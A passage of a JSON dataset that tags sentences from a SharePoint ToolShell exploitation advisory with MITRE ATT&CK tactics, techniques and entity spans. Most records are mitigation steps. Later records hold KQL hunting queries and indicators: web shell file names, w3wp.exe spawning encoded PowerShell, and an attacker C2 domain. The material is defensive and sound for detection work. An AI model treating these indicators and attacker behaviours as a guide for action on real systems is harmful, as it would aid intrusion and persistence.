}, { "uid": "mitre-92_mitre_report-p1-s42-b9d092", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Use or upgrade to supported versions of on-premises Microsoft SharePoint Server.", "sentence_text": "Ensure the\nAntimalware Scan Interface is turned on and configured correctly and deploy Defender Antivirus on all SharePoint servers Configure Antimalware Scan Interface (AMSI) integration in SharePoint, enable Full Mode for optimal protection, and deploy Defender Antivirus on all SharePoint servers which will stop unauthenticated attackers from exploiting this vulnerability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s43-1d8632", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Ensure the\nAntimalware Scan Interface is turned on and configured correctly and deploy Defender Antivirus on all SharePoint servers Configure Antimalware Scan Interface (AMSI) integration in SharePoint, enable Full Mode for optimal protection, and deploy Defender Antivirus on all SharePoint servers which will stop unauthenticated attackers from exploiting this vulnerability.", "sentence_text": "Note: AMSI integration was enabled by default in the September 2023 security update for SharePoint Server 2016/2019 and the Version 23H2 feature update for SharePoint Server Subscription Edition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s44-c38f87", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "Note: AMSI integration was enabled by default in the September 2023 security update for SharePoint Server 2016/2019 and the Version 23H2 feature update for SharePoint Server Subscription Edition.", "sentence_text": "If you cannot enable AMSI, we recommend you consider disconnecting your server from the internet until you have applied the most current security update linked above.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s45-1392f6", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "If you cannot enable AMSI, we recommend you consider disconnecting your server from the internet until you have applied the most current security update linked above.", "sentence_text": "If the server cannot be disconnected from the internet, consider using a VPN or proxy requiring authentication or an authentication gateway to limit unauthenticated traffic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s46-5e429e", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "If the server cannot be disconnected from the internet, consider using a VPN or proxy requiring authentication or an authentication gateway to limit unauthenticated traffic.", "sentence_text": "Deploy Microsoft Defender for Endpoint, or equivalent solutions We recommend organizations to deploy Defender for Endpoint to detect and block post-exploit activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s47-dd604c", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "Deploy Microsoft Defender for Endpoint, or equivalent solutions We recommend organizations to deploy Defender for Endpoint to detect and block post-exploit activity.", "sentence_text": "Rotate SharePoint Server ASP.NET machine keys After applying the latest security updates above or enabling AMSI, it is critical that customers rotate SharePoint server ASP.NET machine keys and restart Internet Information Services (IIS) on all SharePoint servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s48-8ea3f7", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "Rotate SharePoint Server ASP.NET machine keys After applying the latest security updates above or enabling AMSI, it is critical that customers rotate SharePoint server ASP.NET machine keys and restart Internet Information Services (IIS) on all SharePoint servers.", "sentence_text": "Manually using PowerShell To update the machine keys using PowerShell, use the Set-SPMachineKey cmdlet Manually using Central Admin: Trigger the Machine Key Rotation timer job by performing the following steps:\nNavigate to the Central Administration site.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s49-bd21de", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "Manually using PowerShell To update the machine keys using PowerShell, use the Set-SPMachineKey cmdlet Manually using Central Admin: Trigger the Machine Key Rotation timer job by performing the following steps:\nNavigate to the Central Administration site.", "sentence_text": "Go to\nMonitoring\n->\nReview job definition Search for Machine Key Rotation Job and select", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s50-130610", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "Go to\nMonitoring\n->\nReview job definition Search for Machine Key Rotation Job and select", "sentence_text": "Run Now Restart IIS on all SharePoint servers using iisreset.exe NOTE: If you cannot enable AMSI, you will need to rotate your keys and restart IIS after you install the new security update.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s51-67f24f", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Run Now Restart IIS on all SharePoint servers using iisreset.exe NOTE: If you cannot enable AMSI, you will need to rotate your keys and restart IIS after you install the new security update.", "sentence_text": "Implement your incident response plan.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s52-e03594", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Implement your incident response plan.", "sentence_text": "To protect against post-exploitation activity, including ransomware deployment, Microsoft recommends the following mitigations:\nTurn on\ncloud-delivered protection\nin Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s53-e26a01", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "To protect against post-exploitation activity, including ransomware deployment, Microsoft recommends the following mitigations:\nTurn on\ncloud-delivered protection\nin Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.", "sentence_text": "Cloud-based machine learning protections block a huge majority of new and unknown variants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s54-6aacc0", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Cloud-based machine learning protections block a huge majority of new and unknown variants.", "sentence_text": "Read our\nhuman-operated ransomware blog for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s55-dbc871", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "Read our\nhuman-operated ransomware blog for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.", "sentence_text": "Run\nendpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint – or equivalent EDR solution – can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s56-21d5e0", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "Run\nendpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint – or equivalent EDR solution – can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.", "sentence_text": "EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s57-f4c186", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.", "sentence_text": "Configure\nautomatic attack disruption in Microsoft Defender XDR.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s58-3e8c49", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "Configure\nautomatic attack disruption in Microsoft Defender XDR.", "sentence_text": "Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization’s assets, and provide more time for security teams to remediate the attack fully.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s59-c6ecc1", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization’s assets, and provide more time for security teams to remediate the attack fully.", "sentence_text": "Enable\nLSA protection\nEnable and configure Credential Guard Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s60-c64dc7", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Enable\nLSA protection\nEnable and configure Credential Guard Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.", "sentence_text": "Enable\ncontrolled folder\naccess.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s61-1a472e", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "Enable\ncontrolled folder\naccess.", "sentence_text": "attack surface reduction rules to prevent common attack techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s62-0836a9", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "attack surface reduction rules to prevent common attack techniques.", "sentence_text": "Attack surface reduction rules are sweeping settings that stop entire classes of threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s63-d04a03", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "Attack surface reduction rules are sweeping settings that stop entire classes of threats.", "sentence_text": "The following bullet points offer more guidance on specific mitigation advice:\nUse advanced protection against ransomware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s64-0129dc", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "The following bullet points offer more guidance on specific mitigation advice:\nUse advanced protection against ransomware.", "sentence_text": "The following table outlines the tactics observed in the exploitation attacks discussed in this blog, along with Microsoft Defender protection coverage at each stage of the attack chain:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s65-3e2f3a", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "The following table outlines the tactics observed in the exploitation attacks discussed in this blog, along with Microsoft Defender protection coverage at each stage of the attack chain:", "sentence_text": "Note: These alerts can also be triggered by unrelated threat activity Vulnerability management Customers using Microsoft Defender Vulnerability Management can identify exposed devices and track remediation efforts based on the following CVEs:\nCVE-2025-53770 – SharePoint ToolShell Auth Bypass and RCE CVE-2025-53771 – SharePoint ToolShell Path Traversal CVE-2025-49704 – SharePoint RCE CVE-2025-49706 – SharePoint Post-auth RCE Navigate to Vulnerability management > Weaknesses and filter by these CVE IDs to view exposed devices, remediation status, and Evidence of Exploitation tags.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s66-02e10f", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "Note: These alerts can also be triggered by unrelated threat activity Vulnerability management Customers using Microsoft Defender Vulnerability Management can identify exposed devices and track remediation efforts based on the following CVEs:\nCVE-2025-53770 – SharePoint ToolShell Auth Bypass and RCE CVE-2025-53771 – SharePoint ToolShell Path Traversal CVE-2025-49704 – SharePoint RCE CVE-2025-49706 – SharePoint Post-auth RCE Navigate to Vulnerability management > Weaknesses and filter by these CVE IDs to view exposed devices, remediation status, and Evidence of Exploitation tags.", "sentence_text": "Customers should manually verify patching status.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s67-a7544f", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "Customers should manually verify patching status.", "sentence_text": "Hunting queries\nTo locate possible exploitation activity, run the following queries in Microsoft Defender XDR security center.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s68-4ed837", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "Hunting queries\nTo locate possible exploitation activity, run the following queries in Microsoft Defender XDR security center.", "sentence_text": "Successful exploitation using file creation Look for the creation of spinstall0.aspx , which indicates successful post-exploitation of CVE-2025-53770.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "creation of spinstall0.aspx indicates successful post-exploitation", "entities": [ { "text": "spinstall0.aspx", "start": 69, "end": 84, "label": "MalwareTool" }, { "text": "CVE-2025-53770", "start": 135, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "file creation", "start": 30, "end": 43, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s69-1ca436", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "Successful exploitation using file creation Look for the creation of spinstall0.aspx , which indicates successful post-exploitation of CVE-2025-53770.", "sentence_text": "DeviceFileEvents\n| where FolderPath has_any (\"microsoft shared\\\\Web Server Extensions\\\\15\\\\TEMPLATE\\\\LAYOUTS\", \"microsoft shared\\\\Web Server Extensions\\\\16\\\\TEMPLATE\\\\LAYOUTS\")\n| where FileName contains \"spinstall\" or FileName contains \"spupdate\" or FileName contains \"SpLogoutLayout\" or FileName contains \"SP.UI.TitleView\" or FileName contains \"queryruleaddtool\" or FileName contains \"ClientId\" | project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, FolderPath, ReportId, ActionType, SHA256 | order by Timestamp desc Post-exploitation PowerShell dropping web shell Look for process creation where w3wp.exe is spawning encoded PowerShell involving the spinstall0.aspx file or the file paths it’s been known to be written to.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "w3wp.exe is spawning encoded PowerShell involving spinstall0.aspx", "entities": [ { "text": "spinstall0.aspx", "start": 697, "end": 712, "label": "MalwareTool" }, { "text": "spinstall", "start": 204, "end": 213, "label": "MalwareTool" }, { "text": "spupdate", "start": 237, "end": 245, "label": "MalwareTool" }, { "text": "SpLogoutLayout", "start": 269, "end": 283, "label": "MalwareTool" }, { "text": "SP.UI.TitleView", "start": 307, "end": 322, "label": "MalwareTool" }, { "text": "queryruleaddtool", "start": 346, "end": 362, "label": "MalwareTool" }, { "text": "ClientId", "start": 386, "end": 394, "label": "MalwareTool" }, { "text": "PowerShell ", "start": 581, "end": 592, "label": "MalwareTool" }, { "text": "microsoft shared\\\\Web Server Extensions\\\\15\\\\TEMPLATE\\\\LAYOUTS", "start": 46, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "microsoft shared\\\\Web Server Extensions\\\\16\\\\TEMPLATE\\\\LAYOUTS", "start": 112, "end": 174, "label": "Infrastructure_Indicator" }, { "text": "process creation", "start": 620, "end": 636, "label": "Action" }, { "text": "w3wp.exe", "start": 643, "end": 651, "label": "Infrastructure_Indicator" }, { "text": "spawning encoded PowerShell", "start": 655, "end": 682, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s70-ecd1c0", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "DeviceFileEvents\n| where FolderPath has_any (\"microsoft shared\\\\Web Server Extensions\\\\15\\\\TEMPLATE\\\\LAYOUTS\", \"microsoft shared\\\\Web Server Extensions\\\\16\\\\TEMPLATE\\\\LAYOUTS\")\n| where FileName contains \"spinstall\" or FileName contains \"spupdate\" or FileName contains \"SpLogoutLayout\" or FileName contains \"SP.UI.TitleView\" or FileName contains \"queryruleaddtool\" or FileName contains \"ClientId\" | project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, FolderPath, ReportId, ActionType, SHA256 | order by Timestamp desc Post-exploitation PowerShell dropping web shell Look for process creation where w3wp.exe is spawning encoded PowerShell involving the spinstall0.aspx file or the file paths it’s been known to be written to.", "sentence_text": "DeviceProcessEvents\n| where InitiatingProcessFileName has \"w3wp.exe\" and InitiatingProcessCommandLine !has \"DefaultAppPool\" and FileName =~ \"cmd.exe\" and ProcessCommandLine has_all (\"cmd.exe\", \"powershell\")\nand ProcessCommandLine has_any (\"EncodedCommand\", \"-ec\")\n| extend CommandArguments = split(ProcessCommandLine, \" \")", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "None", "entities": [ { "text": "powershell", "start": 194, "end": 204, "label": "MalwareTool" }, { "text": "cmd.exe", "start": 141, "end": 148, "label": "MalwareTool" }, { "text": "DeviceProcessEvents", "start": 0, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "w3wp.exe", "start": 59, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "DefaultAppPool", "start": 108, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "EncodedCommand", "start": 240, "end": 254, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s71-b386cb", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "DeviceProcessEvents\n| where InitiatingProcessFileName has \"w3wp.exe\" and InitiatingProcessCommandLine !has \"DefaultAppPool\" and FileName =~ \"cmd.exe\" and ProcessCommandLine has_all (\"cmd.exe\", \"powershell\")\nand ProcessCommandLine has_any (\"EncodedCommand\", \"-ec\")\n| extend CommandArguments = split(ProcessCommandLine, \" \")", "sentence_text": "| mv-expand CommandArguments to typeof(string)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s72-909e4a", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "| mv-expand CommandArguments to typeof(string)", "sentence_text": "| where B64Decode contains \"spinstall\" or B64Decode contains \"spupdate\" or B64Decode contains \"SpLogoutLayout\" or B64Decode contains \"SP.UI.TitleView\" or B64Decode contains \"queryruleaddtool\" or B64Decode contains \"ClientId\" and B64Decode contains @'C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\15\\TEMPLATE\\LAYOUTS' or B64Decode contains @'C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS' Post-exploitation web shell dropped Look for the web shell dropped using the PowerShell command.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "None", "entities": [ { "text": "spinstall", "start": 28, "end": 37, "label": "MalwareTool" }, { "text": "spupdate", "start": 62, "end": 70, "label": "MalwareTool" }, { "text": "SpLogoutLayout", "start": 95, "end": 109, "label": "MalwareTool" }, { "text": "SP.UI.TitleView", "start": 134, "end": 149, "label": "MalwareTool" }, { "text": "queryruleaddtool", "start": 174, "end": 190, "label": "MalwareTool" }, { "text": "ClientId", "start": 215, "end": 223, "label": "MalwareTool" }, { "text": "web shell", "start": 443, "end": 452, "label": "MalwareTool" }, { "text": "PowerShell command", "start": 471, "end": 489, "label": "MalwareTool" }, { "text": "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\15\\TEMPLATE\\LAYOUTS", "start": 250, "end": 308, "label": "Infrastructure_Indicator" }, { "text": "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS", "start": 334, "end": 392, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s73-a14440", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "| where B64Decode contains \"spinstall\" or B64Decode contains \"spupdate\" or B64Decode contains \"SpLogoutLayout\" or B64Decode contains \"SP.UI.TitleView\" or B64Decode contains \"queryruleaddtool\" or B64Decode contains \"ClientId\" and B64Decode contains @'C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\15\\TEMPLATE\\LAYOUTS' or B64Decode contains @'C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS' Post-exploitation web shell dropped Look for the web shell dropped using the PowerShell command.", "sentence_text": "DeviceFileEvents\n| where Timestamp >ago(7d)\n| where InitiatingProcessFileName=~\"powershell.exe\" | where FileName contains \"spinstall\" or FileName contains \"spupdate\" or FileName contains \"SpLogoutLayout\" or FileName contains \"SP.UI.TitleView\" or FileName contains \"queryruleaddtool\" or FileName contains \"ClientId\" Exploitation detected by Defender Look at Microsoft Defender for Endpoint telemetry to determine if specific alerts fired in your environment.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "powershell.exe creating specific web shell files", "entities": [ { "text": "spinstall", "start": 123, "end": 132, "label": "MalwareTool" }, { "text": "spupdate", "start": 156, "end": 164, "label": "MalwareTool" }, { "text": "powershell.exe", "start": 80, "end": 94, "label": "MalwareTool" }, { "text": "SpLogoutLayout", "start": 188, "end": 202, "label": "MalwareTool" }, { "text": "SP.UI.TitleView", "start": 226, "end": 241, "label": "MalwareTool" }, { "text": "queryruleaddtool", "start": 265, "end": 281, "label": "MalwareTool" }, { "text": "ClientId", "start": 305, "end": 313, "label": "MalwareTool" }, { "text": "Microsoft Defender for Endpoint", "start": 357, "end": 388, "label": "Infrastructure_Indicator" }, { "text": "Exploitation detected by Defender", "start": 315, "end": 348, "label": "Action" }, { "text": "determine if specific alerts fired", "start": 402, "end": 436, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s74-d367b7", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "DeviceFileEvents\n| where Timestamp >ago(7d)\n| where InitiatingProcessFileName=~\"powershell.exe\" | where FileName contains \"spinstall\" or FileName contains \"spupdate\" or FileName contains \"SpLogoutLayout\" or FileName contains \"SP.UI.TitleView\" or FileName contains \"queryruleaddtool\" or FileName contains \"ClientId\" Exploitation detected by Defender Look at Microsoft Defender for Endpoint telemetry to determine if specific alerts fired in your environment.", "sentence_text": "Unified advanced hunting queries Find exposed devices Look for devices vulnerable to the CVEs listed in blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s75-57273b", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "Unified advanced hunting queries Find exposed devices Look for devices vulnerable to the CVEs listed in blog.", "sentence_text": "DeviceTvmSoftwareVulnerabilities\n| where CveId in (\"CVE-2025-49704\",\"CVE-2025-49706\",\"CVE-2025-53770\",\"CVE-2025-53771\")\nWeb shell C2 communication Find devices that may have communicated with Storm-2603 web shell C2, that may indicate a compromised device beaconing to Storm-2603 controlled infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "compromised device beaconing to Storm-2603 controlled infrastructure via web shell C2", "entities": [ { "text": "Storm-2603", "start": 192, "end": 202, "label": "ThreatActor" }, { "text": "web shell C2", "start": 203, "end": 215, "label": "MalwareTool" }, { "text": "DeviceTvmSoftwareVulnerabilities", "start": 0, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-49704", "start": 52, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-49706", "start": 69, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-53770", "start": 86, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-53771", "start": 103, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "beaconing", "start": 256, "end": 265, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s76-0dbdc6", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "DeviceTvmSoftwareVulnerabilities\n| where CveId in (\"CVE-2025-49704\",\"CVE-2025-49706\",\"CVE-2025-53770\",\"CVE-2025-53771\")\nWeb shell C2 communication Find devices that may have communicated with Storm-2603 web shell C2, that may indicate a compromised device beaconing to Storm-2603 controlled infrastructure.", "sentence_text": "let domainList = dynamic([\"update.updatemicfosoft.com\"]);\nunion\n(\nDnsEvents\n| where QueryType has_any(domainList) or Name has_any(domainList)\n| project TimeGenerated, Domain = QueryType, SourceTable = \"DnsEvents\" ), ( IdentityQueryEvents | where QueryTarget has_any(domainList)\n| project Timestamp, Domain = QueryTarget, SourceTable = \"IdentityQueryEvents\" ), ( DeviceNetworkEvents | where RemoteUrl has_any(domainList)\n| project Timestamp, Domain = RemoteUrl, SourceTable = \"DeviceNetworkEvents\" ), ( DeviceNetworkInfo | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "None", "entities": [ { "text": "update.updatemicfosoft.com", "start": 27, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "domainList", "start": 102, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "IdentityQueryEvents", "start": 336, "end": 355, "label": "Infrastructure_Indicator" }, { "text": "DeviceNetworkEvents", "start": 362, "end": 381, "label": "Infrastructure_Indicator" }, { "text": "DeviceNetworkInfo", "start": 502, "end": 519, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s77-84a174", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "let domainList = dynamic([\"update.updatemicfosoft.com\"]);\nunion\n(\nDnsEvents\n| where QueryType has_any(domainList) or Name has_any(domainList)\n| project TimeGenerated, Domain = QueryType, SourceTable = \"DnsEvents\" ), ( IdentityQueryEvents | where QueryTarget has_any(domainList)\n| project Timestamp, Domain = QueryTarget, SourceTable = \"IdentityQueryEvents\" ), ( DeviceNetworkEvents | where RemoteUrl has_any(domainList)\n| project Timestamp, Domain = RemoteUrl, SourceTable = \"DeviceNetworkEvents\" ), ( DeviceNetworkInfo | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)", "sentence_text": "| mv-expand DnsAddresses, ConnectedNetworks | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)\n| project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = \"DeviceNetworkInfo\" ), ( VMConnection | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)\n| mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)\n| project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = \"VMConnection\" ), ( W3CIISLog | where csHost has_any(domainList) or csReferer has_any(domainList)\n| project", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s78-e4698c", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "| mv-expand DnsAddresses, ConnectedNetworks | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)\n| project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = \"DeviceNetworkInfo\" ), ( VMConnection | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)\n| mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)\n| project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = \"VMConnection\" ), ( W3CIISLog | where csHost has_any(domainList) or csReferer has_any(domainList)\n| project", "sentence_text": "| order by TimeGenerated desc to have the analytics rule deployed in their Sentinel workspace.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s79-26e7d2", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "| order by TimeGenerated desc to have the analytics rule deployed in their Sentinel workspace.", "sentence_text": "Our post on web shell threat hunting with Microsoft Sentinel also provides guidance on looking for web shells in general.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s80-5a26c9", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "Our post on web shell threat hunting with Microsoft Sentinel also provides guidance on looking for web shells in general.", "sentence_text": "Several hunting queries are also available below:\nWeb shell detection Possible Webshell drop Malicious web application requests linked with Microsoft Defender for Endpoint alerts Web shell activity Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s81-528784", "source": "mitre", "doc_id": 